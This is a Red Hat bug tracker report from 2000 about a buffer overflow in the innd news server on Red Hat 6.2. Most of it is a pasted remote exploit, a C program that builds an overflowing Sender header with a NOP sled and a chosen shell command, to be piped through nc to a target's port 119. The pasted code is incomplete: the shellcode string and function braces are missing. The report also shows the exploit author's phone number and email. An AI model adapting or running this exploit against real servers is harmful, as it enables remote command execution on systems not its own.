Bug 12412 - buffer overflow in innd
Summary: buffer overflow in innd
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: inn   
(Show other bugs)
Version: 6.2
Hardware: i386 Linux
Target Milestone: ---
Assignee: Florian La Roche
QA Contact:
URL: http://packetstorm.securify.com
Keywords: Security
Depends On:
TreeView+ depends on / blocked
Reported: 2000-06-18 08:57 UTC by Zoran Verovski
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2000-07-25 17:11:02 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

Description Zoran Verovski 2000-06-18 08:57:01 UTC

This is information I picked up from packetstorm.
It seems that inn in RH 6.2 has buffer overflow. Here is a source code for 
exploit. (I haven't checked it)

URL of the author is appended, but there I couldn't find anything useful.

Zoran Verovski

--- exploit ---
 * inndx: innd remote 'news' user/group exploit
 * Written on 12th June 2000 by Wojciech Purczynski
 * <wp@elzabsoft.pl> cliph/ircnet
 * Bug found by Michal Zalewski.
 * Tested on innd-2.2.2-3 default installation on RedHat 6.2.
 * Usage:
 * ./inndx [command [offset]]|nc -i 1 target.host 119

#include <stdio.h>
#include <unistd.h>

#define RETADDR 0x8138004 /* we're jumping into the body of cancel msg */
#define BUFSIZE (256+2*4+4) /* buff + EBP + EIP + Data */
#define JUNKSIZE strlen("\"\" wants to cancel <> by \"")
#define NOP 0x90
#define FAKEPTR 0xbffff1c0
#define COMMAND "echo U have b33n h@x0r3d hahahah|mail root"
#define BODYSIZE 999

/* Code written by me */
char * run_command=

int main(int argc, char *argv[])
        int retaddr=RETADDR;
        char messageid[256];
        char sender[16];
        char body[BODYSIZE];
        char * command=COMMAND;
        int midsize;
        int i;

        if (argc>1) command=argv[1];
        if (argc>2) retaddr+=atoi(argv[2]);

        memset(sender, 0, sizeof(sender));
        strcpy(sender+0, "a@a.");               /* EBP */
        *(long*)(sender+4)=(long)retaddr;       /* EIP */
        *(long*)(sender+8)=(long)RETADDR+1000;  /* Data */
        memset(messageid, 'a', sizeof(messageid));
        sprintf(messageid, "%s@a", tmpnam(NULL)+9);

        memset(body, NOP, sizeof(body));
        strcat(body, command);
        strcat(body, "\xff");
        fprintf(stderr, "RETADDR=%p\n", retaddr);
        fprintf(stderr, "COMMAND=%s\n", command);
        printf("mode reader\r\ngroup test\r\npost\r\n");
        printf("Message-ID: <%s>\r\n", messageid);
        printf("From: %s\r\nSender: %s\r\n", sender, sender);
        printf("Newsgroups: test\r\n");
        printf("Subject: blah\r\n");
        printf("group control\r\npost\r\n");
        printf("Message-ID: <%s@test>\r\n", tmpnam(NULL)+9);
        printf("From: a@b.c\r\nSender: a@b.c\r\n");
        printf("Control: cancel <%s>\r\n", messageid);
        printf("Subject: cmsg cancel <%s>\r\n", messageid);
        printf("Newsgroups: control\r\n\r\n%s\r\n.\r\nquit\r\n", body);
--- eof ---

| Wojciech Purczynski   wp@elzabsoft.pl  http://www.elzabsoft.pl/~wp |
| GSM: +48604432981   Linux Administrator   SMS: wp-sms@elzabsoft.pl |
+------ Public GnuPG Key:  http://www.elzabsoft.pl/~wp/gpg.asc ------+

Comment 1 Florian La Roche 2000-07-25 17:11:00 UTC
should be fixed in the next rawhide release

Note You need to log in before you can comment on or make changes to this bug.